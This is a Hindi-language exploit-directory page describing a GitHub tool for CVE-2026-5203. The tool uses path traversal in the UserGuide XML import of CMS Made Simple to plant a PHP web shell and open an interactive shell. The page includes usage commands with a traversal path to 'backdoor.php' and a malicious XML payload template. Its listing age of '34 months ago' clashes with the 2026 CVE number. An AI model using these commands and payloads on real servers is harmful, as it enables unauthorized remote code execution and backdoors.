Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5203 — CMS Made Simple में CVE-2026-5203 के लिए एक्सप्लॉइट, इंटरैक्टिव शेल के साथ रिमोट कोड निष्पादन प्राप्त करने के लिए पथ ट्रैवर्सल और मनमाना फ़ाइल अपलोड का लाभ उठाता है। | Kitploit
उपकरण/GitHubGitHub/caginkyr/cve-2026-5203
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

CMS Made Simple में CVE-2026-5203 के लिए एक्सप्लॉइट, इंटरैक्टिव शेल के साथ रिमोट कोड निष्पादन प्राप्त करने के लिए पथ ट्रैवर्सल और मनमाना फ़ाइल अपलोड का लाभ उठाता है।

रिपॉजिटरी देखें
34 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE (पथ ट्रैवर्सल + स्वेच्छिक फ़ाइल अपलोड)

CVSS Version Type

सारांश

CMS Made Simple ≤ 2.2.22 में UserGuide मॉड्यूल की XML आयात कार्यक्षमता उपयोगकर्ता द्वारा प्रदान किए गए फ़ाइलनामों को सैनिटाइज़ करने में विफल रहती है, जिससे एक प्रमाणित प्रशासक पथ ट्रैवर्सल अनुक्रमों के माध्यम से सर्वर फ़ाइलसिस्टम पर कहीं भी स्वेच्छिक फ़ाइलें (जैसे PHP वेब शेल) अपलोड कर सकता है।

फ़ील्डमान
प्रकारपथ ट्रैवर्सल / स्वेच्छिक फ़ाइल अपलोड → RCE
घटकUserGuide मॉड्यूल — XML आयात
प्रभावित फ़ाइलmodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
प्रमाणीकरण आवश्यकहाँ (प्रशासक)

कमजोर कोड

// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

यह फ़ंक्शन Base64-डिकोडेड सामग्री को सीधे हमलावर-नियंत्रित पथ पर लिखता है।


उपयोग

python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

उदाहरण:

# डिफ़ॉल्ट पथ
python exploit.py http://target.com http://target.com/admin admin password123

# कस्टम अपलोड पथ
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

यदि अपलोड के बाद वेब शेल तक पहुँचा जा सकता है तो इंटरैक्टिव शेल स्वचालित रूप से शुरू होता है।


दुर्भावनापूर्ण XML संरचना

<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>

टूल डाउनलोड करें